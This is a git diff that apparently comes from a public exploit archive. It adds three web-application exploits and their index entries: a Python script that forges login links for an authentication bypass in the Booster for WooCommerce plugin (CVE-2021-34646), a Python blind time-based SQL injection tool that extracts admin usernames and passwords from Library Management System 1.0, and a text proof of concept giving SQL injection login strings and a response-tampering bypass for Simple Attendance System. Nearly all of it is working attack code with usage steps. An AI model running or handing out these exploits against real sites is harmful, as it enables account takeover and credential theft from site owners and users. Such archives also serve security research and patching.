diff --git a/exploits/php/webapps/50299.py b/exploits/php/webapps/50299.py new file mode 100755 index 000000000..a5eb59faa --- /dev/null +++ b/exploits/php/webapps/50299.py @@ -0,0 +1,79 @@ +# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass +# Date: 2021-09-16 +# Exploit Author: Sebastian Kriesten (0xB455) +# Contact: https://twitter.com/0xB455 +# +# Affected Plugin: Booster for WooCommerce +# Plugin Slug: woocommerce-jetpack +# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/ +# Affected Versions: <= 5.4.3 +# Fully Patched Version: >= 5.4.4 +# CVE: CVE-2021-34646 +# CVSS Score: 9.8 (Critical) +# Category: webapps +# +# 1: +# Goto: https://target.com/wp-json/wp/v2/users/ +# Pick a user-ID (e.g. 1 - usualy is the admin) +# +# 2: +# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1 +# +# 3: +# Check-Out out which of the generated links allows you to access the system +# +import requests,sys,hashlib +import argparse +import datetime +import email.utils +import calendar +import base64 + +B = "\033[94m" +W = "\033[97m" +R = "\033[91m" +RST = "\033[0;0m" + +parser = argparse.ArgumentParser() +parser.add_argument("url", help="the base url") +parser.add_argument('id', type=int, help='the user id', default=1) +args = parser.parse_args() +id = str(args.id) +url = args.url +if args.url[-1] != "/": # URL needs trailing / + url = url + "/" + +verify_url= url + "?wcj_user_id=" + id +r = requests.get(verify_url) + +if r.status_code != 200: + print("status code != 200") + print(r.headers) + sys.exit(-1) + +def email_time_to_timestamp(s): + tt = email.utils.parsedate_tz(s) + if tt is None: return None + return calendar.timegm(tt) - tt[9] + +date = r.headers["Date"] +unix = email_time_to_timestamp(date) + +def printBanner(): + print(f"{W}Timestamp: {B}" + date) + print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n") + print("We need to generate multiple timestamps in order to avoid delay related timing errors") + print("One of the following links will log you in...\n") + +printBanner() + + + +for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors + hash = hashlib.md5(str(unix-i).encode()).hexdigest() + print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:") + token='{"id":"'+ id +'","code":"'+hash+'"}' + token = base64.b64encode(token.encode()).decode() + token = token.rstrip("=") # remove trailing = + link = url+"my-account/?wcj_verify_email="+token + print(link + f"\n{RST}") \ No newline at end of file diff --git a/exploits/php/webapps/50300.py b/exploits/php/webapps/50300.py new file mode 100755 index 000000000..802b2a040 --- /dev/null +++ b/exploits/php/webapps/50300.py @@ -0,0 +1,148 @@ +# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated) +# Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec) +# Date: 16/09/2021 +# Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip +# Vendor: breakthrough2 +# Tested on: Kali Linux, Apache, Mysql +# Version: v1.0 +# Exploit Description: +# Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack. +# Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html +import requests,argparse +from colorama import (Fore as F, Back as B, Style as S) + +BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT +def bullet(char,color): + C=FB if color == 'B' else FR if color == 'R' else FG + return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' +info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G') +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} + +# POST /LibraryManagement/fine-student.php +# inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha +def sqliPayload(char,position,userid,column,table): + sqli = 'inject\' UNION SELECT IF(SUBSTRING(' + sqli += str(column)+',' + sqli += str(position)+',1) = \'' + sqli += str(char)+'\',sleep(1),null) FROM ' + sqli += str(table)+' WHERE adminId=' + sqli += str(userid)+'; -- kamahamaha' + return sqli + +chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', + 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', + 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', + 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7', + '8','9','@','#'] + +def postRequest(URL,sqliReq,char,position,pxy): + sqliURL = URL + params = {"check":1,"id":sqliReq} + if pxy: + req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies,timeout=10) + else: + req = requests.post(url=sqliURL, data=params, verify=False, timeout=10) + #print("{} : {}".format(char,req.elapsed.total_seconds())) + return req.elapsed.total_seconds() + +def theHarvester(target,CHARS,url,pxy): + #print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id'])) + position = 1 + theHarvest = "" + while position < 8: + for char in CHARS: + sqliReq = sqliPayload(char,position,target['id'],target['column'],target['table']) + if postRequest(url,sqliReq,char,position,pxy) > 1: + theHarvest += char + break; + position += 1 + return theHarvest + +class userObj: + def __init__(self,username,password): + self.username = username + self.password = password + +class tableSize: + def __init__(self,sizeU,sizeP): + self.sizeU = sizeU + self.sizeP = sizeP + self.uTitle = "Admin Usernames"+" "*(sizeU-15)+BR+" "+ST + self.pTitle = "Admin Passwords"+" "*(sizeP-15)+BR+" "+ST + def printHeader(self): + width = self.sizeU+self.sizeP+3 + print(BR+" "*width+ST) + print(self.uTitle,self.pTitle) + print(BR+" "*width+ST) + +def printTableRow(user,size): + username = user.username + unLen = len(username) + if unLen < size.sizeU: + username = username+(" "*(size.sizeU - unLen)) + else: + name = name[:size.sizeU] + username += BR+" "+ST + password = user.password + pLen = len(password) + if pLen < size.sizeP: + password = password+(" "*(size.sizeP - pLen)) + else: + password = password[:size.sizeP] + password += BR+" "+ST + print(username,password) + + +def sig(): + SIG = SB+FY+" .-----.._ ,--.\n" + SIG += FY+" | .. > ___ | | .--.\n" + SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n" + SIG += FY+" | ) "+FR+" * *"+FY+" / \\ \\\n" + SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n" + SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST + return SIG + +def argsetup(): + about = SB+FT+'Unauthenticated Blind Time-Based SQL Injection Exploit - Library Manager'+ST + parser = argparse.ArgumentParser(description=about) + parser.add_argument('targetHost',type=str,help='The DNS routable target hostname. Example: "http://0xBoku.com"') + parser.add_argument('DumpXAdmins',type=int,help='Number of admin credentials to dump. Example: 5') + parser.add_argument('-p','--proxy',type=str,help='<127.0.0.1:8080> Proxy requests sent') + args = parser.parse_args() + if args.proxy: + regex = '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}$' + if re.match(regex,args.proxy,re.IGNORECASE): + args.proxy = {'http':'http://{}'.format(args.proxy),'https':'https://{}'.format(args.proxy)} + else: + print('{}Error: Supplied proxy argument {} fails to match regex {}'.format(err,args.proxy,regex)) + print('{}Example: {} -p "127.0.0.1:8080"'.format(err,sys.argv[0])) + sys.exit(-1) + else: + proxy = False + return args + +if __name__ == "__main__": + header = SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST + print(header) + print(sig()) + args = argsetup() + host = args.targetHost + pxy = args.proxy + admins = args.DumpXAdmins + PATH = host+"/LibraryManagement/fine-student.php" + size = tableSize(20,20) + size.printHeader() + dumpnumber = 1 + while dumpnumber <= admins: + adminUsername = { "id":dumpnumber, "table":"admin", "column":"username"} + adminUsername = theHarvester(adminUsername,chars,PATH,pxy) + adminPassword = { "id":dumpnumber, "table":"admin", "column":"password"} + adminPass = theHarvester(adminPassword,chars,PATH,pxy) + adminUser = userObj(adminUsername,adminPass) + printTableRow(adminUser,size) + # print("Admin's Username is: {}".format(adminUsername)) + # print("Admin's Password is: {}".format(adminPass)) + dumpnumber += 1 \ No newline at end of file diff --git a/exploits/php/webapps/50301.txt b/exploits/php/webapps/50301.txt new file mode 100644 index 000000000..df294a856 --- /dev/null +++ b/exploits/php/webapps/50301.txt @@ -0,0 +1,33 @@ +# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass +# Exploit Author: Abdullah Khawaja (hax.3xploit) +# Date: September 17, 2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip +# Tested on: Linux, windows +# Vendor: oretnom23 +# Version: v1.0 + +# Exploit Description: +Simple Attendance System, is prone to multiple vulnerabilities. +Easy authentication bypass vulnerability on the application +allowing the attacker to login + + +----- PoC: Authentication Bypass ----- + +Administration Panel: http://localhost/attendance/login.php + +Username: admin' or ''=' -- -+ +Password: admin' or ''=' -- -+ + + +----- PoC-2: Authentication Bypass ----- + +Steps: +1. Enter wrong crendentials http://localhost/attendance/login.php +2. Capture the request in burp and send it to repeater. +3. Forward the request. +4. In response tab, replace : + {"status":"failed","msg":"Invalid username or password."} + with + {"status":"success","msg":"Login successfully."} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 14c41ae78..8791f8482 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44417,3 +44417,6 @@ id,file,description,date,author,type,platform,port 50295,exploits/hardware/webapps/50295.txt,"Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",webapps,hardware, 50296,exploits/php/webapps/50296.py,"Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50297,exploits/php/webapps/50297.py,"AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ricardo Ruiz",webapps,php, +50299,exploits/php/webapps/50299.py,"WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass",1970-01-01,0xB455,webapps,php, +50300,exploits/php/webapps/50300.py,"Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,boku,webapps,php, +50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",1970-01-01,"Abdullah Khawaja",webapps,php,